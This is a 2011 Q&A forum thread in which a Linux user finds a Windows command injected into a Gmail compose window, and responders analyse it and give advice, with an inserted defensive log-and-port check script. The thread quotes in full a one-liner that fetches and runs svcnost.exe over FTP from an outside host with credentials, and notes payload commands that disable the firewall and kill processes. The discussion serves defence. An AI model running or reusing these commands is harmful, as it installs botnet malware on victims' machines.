My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the TO field:

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned

This looks like Windows command line code to me, and the md start of the code combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a cmd command. I guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.

I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like vMA8ogd7bv so I don't think that someone hacked my Google account.

What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?

Let me address some of the points and questions:

  • I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
  • I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
  • I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
  • The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
  • I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
  • I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
  • I found a Log File Viewer, but I don't know what to look for. Help?

What I really want to know, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and I'm tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.

  • 4
    Did anyone else have access to your computer, or do you have a very old wireless keyboard? Also, Ubuntu has a built-in VNC server. If that's active, a random script somewhere could have connected and assumed it was a windows computer, sending the keystrokes WIN+R, cmd......
    – TuxRug
    Commented Apr 20, 2011 at 19:32
  • 29
    @torbengb: Your post really scares me...
    – user541686
    Commented Apr 20, 2011 at 20:00
  • 9
    Are there any other computers on your wireless network? If the intruder broke their security it would give him an "in" to your local network, which could lead to cracking the Ubuntu box in various ways.
    – CarlF
    Commented Apr 20, 2011 at 20:28
  • 4
    @muntoo ... and I'm sure you haven't written that down anywhere and don't use any app to manage them either, right? Let's not begin password-bashing; at least my password isn't password :-) Commented Apr 21, 2011 at 8:39
  • 6
    Do you have a cat?
    – Zak
    Commented May 19, 2011 at 12:59

I doubt you have anything to worry about. It was more than likely a JavaScript attack that tried to do a drive by download. If you are concerned about this happening start using NoScript and AdBlock Plus Firefox Add-Ons.

Even visiting trustworthy sites you are not safe because they run JavaScript code from third-party advertisers that can be malicious.

I grabbed it and ran it in a VM. It installed mIRC and this is the status log... http://pastebin.com/Mn85akMk

It is an automated attack that is trying to get you to download mIRC and join a botnet that will turn you into a spambot... It had my VM join and make a connection to a number of different remote addresses one of which is autoemail-119.west320.com.

Running it in Windows 7 I had to accept the UAC prompt and allow it access through the firewall.

There seems to be tons of reports of this exact command on other forums, and someone even says that a torrent file tried to execute it when it was finished downloading... I am not sure how that would be possible though.

I haven't used this myself, but it should be able to show you the current network connections so you can see if you are connected to something out of the norm: http://netactview.sourceforge.net/download.html

  • 10
    Er, why were all comments (even the highly highly relevant ones that discovered that the script attempted to open a cmd window) deleted!? Commented Aug 14, 2013 at 23:24
  • Would I be just as safe from this kind of attack if I just started using uBlock Origin? Commented Jan 30, 2017 at 15:15

I agree with @jb48394 that it's probably a JavaScript exploit, like everything else these days.

The fact that it tried to open a cmd window (see @torbengb's comment) and run a malicious command, rather than just downloading the trojan discreetly in the background, suggests that it exploits some vulnerability in Firefox which allows it to enter keystrokes, but not run code.

This also explains why this exploit, which was clearly written exclusively for Windows, would also work in Linux: Firefox runs JavaScript the same way in all OSes (at least, it tries to :) ). If it were caused by a buffer-overflow or similar exploit meant for Windows, it would have just crashed the program.

As for where the JavaScript code came from - probably a malicious Google advert (ads cycle in Gmail throughout the day). It wouldn't be the first time.

  • 4
    Nice references.
    – kizzx2
    Commented Apr 21, 2011 at 11:30
  • 9
    FYI for skimmers, that last "link" is actually five separate links.
    – Pops
    Commented Apr 21, 2011 at 18:50
  • It would be quite shocking if it's really a JavaScript exploit as my Firefox normally stays open for days. However, you need to call a special API to send keys to another system under Windows and probably a different system call (if one exists) under Linux. Since sending keystrokes is not a normal JavaScript operation, I doubt Firefox would implement a cross-platform call for that.
    – billc.cn
    Commented Jul 21, 2011 at 20:53
  • 1
    @billc.cn: I believe writing to the PS/2 keyboard buffer works the same regardless of operating system. Commented Jul 21, 2011 at 21:30

I found a similar attack on another Linux machine. It seems it's some kind of FTP command for Windows.

  • 8
    More precisely, it downloads and runs the file ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe using the Windows ftp command-line tool. Commented Apr 20, 2011 at 18:38
  • found it on pastebin too pastebin.com/FXwRpKH4
    – Shekhar
    Commented Apr 20, 2011 at 18:38
  • here is info about the site whois.domaintools.com/
    – Shekhar
    Commented Apr 20, 2011 at 18:43
  • 9
    It's a WinRAR SFX package containing a portable mIRC install and a file called "DriverUpdate.exe." DriverUpdate.exe executes (at least) two shell commands: netsh firewall set opmode disable and taskkill /F /IM VCSPAWN.EXE /T. It also attempts (I think) to add die-freesms-seite.com to the Internet Explorer trusted zone and proxy bypass. Commented Apr 20, 2011 at 21:18

This doesn't answer your whole question, but in the log file look for failed logon attempts.

If there are more than about five failed attempts in your log, then somebody tried to crack root. If there is a successful attempt to logon to root while you were away from your computer, CHANGE YOUR PASSWORD IMMEDIATELY!! I mean RIGHT NOW! Preferably to something alphanumeric, and about 10 chars long.

With the messages that you got (the echo commands) this really sounds like some immature script kiddie. If it was a real hacker who knew what he was doing, you probably still would not know about it.

  • 2
    I agree this was evidently very amateurish. At least they shouldn't have put echo you've been owned at the end. Makes me wonder if any "real hackers" ever got through? Or indeed I should perhaps be asking, how many? Commented Apr 21, 2011 at 8:43
  • 1
    @torbengb: if the command were run in a windows command prompt, you wouldn't see the echo (because of the &exit) Commented Apr 25, 2011 at 19:08
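Triage helpers for the two checks raised in this thread (failed logons in /var/log/auth.log, and an exposed listener such as Vino/VNC on port 5900 as asked about in the comments), as an added example that is not code from the thread; it runs on constructed sample auth.log and netstat -ltn lines, and the hostname, addresses and temp file names in it are assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread: the two checks the answers suggest,
# failed logons in /var/log/auth.log and an exposed listener such as Vino/VNC on
# port 5900, run here on constructed samples (swap in the real auth.log / netstat -ltn).
AUTH_LOG="${TMPDIR:-/tmp}/auth.sample.log"
NETSTAT_OUT="${TMPDIR:-/tmp}/netstat.sample.txt"

# Constructed auth.log: five failures from one address, then an accepted root login.
cat > "$AUTH_LOG" <<'EOF'
Apr 20 10:01:02 nettop sshd[2101]: Failed password for invalid user admin from 198.51.100.7 port 51822 ssh2
Apr 20 10:01:05 nettop sshd[2101]: Failed password for root from 198.51.100.7 port 51822 ssh2
Apr 20 10:01:09 nettop sshd[2103]: Failed password for root from 198.51.100.7 port 51830 ssh2
Apr 20 10:01:12 nettop sshd[2105]: Failed password for root from 198.51.100.7 port 51834 ssh2
Apr 20 10:01:15 nettop sshd[2107]: Failed password for root from 198.51.100.7 port 51840 ssh2
Apr 20 10:01:20 nettop sshd[2107]: Accepted password for root from 198.51.100.7 port 51840 ssh2
EOF

# Constructed "netstat -ltn": CUPS bound to localhost only, VNC bound to all interfaces.
cat > "$NETSTAT_OUT" <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN
EOF

# Number of lines recording a failed authentication (sshd, login and gdm use these phrasings).
count_failed_logins() {
  grep -ciE 'failed password|authentication failure|invalid user' "$1" || true
}

# Address with the most failures; many from one address is a guessing run, not a typo.
top_failed_source() {
  grep -iE 'failed password|authentication failure' "$1" | grep -oE 'from [0-9.]+' \
    | awk '{print $2}' | sort | uniq -c | sort -rn | awk 'NR==1{print $2}'
}

# 1 if sshd accepted a remote login as root (the case the answer says to act on), else 0.
root_remote_login_accepted() {
  grep -qE 'sshd\[[0-9]+\]: Accepted [a-z]+ for root from' "$1" && echo 1 || echo 0
}

# Ports in LISTEN state bound to every interface (0.0.0.0 or ::), i.e. reachable from the LAN.
exposed_listening_ports() {
  awk '$6=="LISTEN" && $4 ~ /^(0\.0\.0\.0|::):/ {sub(/.*:/,"",$4); print $4}' "$1"
}

echo "failed logins: $(count_failed_logins "$AUTH_LOG") from $(top_failed_source "$AUTH_LOG")"
echo "root login accepted remotely: $(root_remote_login_accepted "$AUTH_LOG")"
echo "ports exposed to the network: $(exposed_listening_ports "$NETSTAT_OUT" | tr '\n' ' ')"
```

On a live Ubuntu box, replace the sample files with /var/log/auth.log and the output of netstat -ltn; a port 5900 listener means Vino (System -> Preferences -> Remote Desktop) is reachable from the network.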

whois reports west320.com is owned by Microsoft.

UPnP and Vino (System -> Preferences -> Remote Desktop) combined with a weak Ubuntu password?

Did you use any nonstandard repositories?

DEF CON has a Wi-Fi competition each year as to how far away a Wi-Fi access point can be reached - the last I heard it was 250 miles.

If you really want to be scared, look at the screenshots of a command-and-control center of a Zeus botnet. No machine is safe, but Firefox on Linux is safer than the rest. Even better if you run SELinux.

  • 1
    The author of this exploit clearly had no intention of running this on Linux, so I doubt it had anything to do with a vulnerable gnome utility or a weak password (also, OP already mentioned he has a secure password) Commented Apr 20, 2011 at 22:11
  • Actually, he does not mention having an Ubuntu password, just a Gmail and wireless passphrase. A kid running metasploit may not even know about Linux, he just sees VNC. It is most likely a JavaScript attack.
    – rjt
    Commented Jun 17, 2012 at 4:21

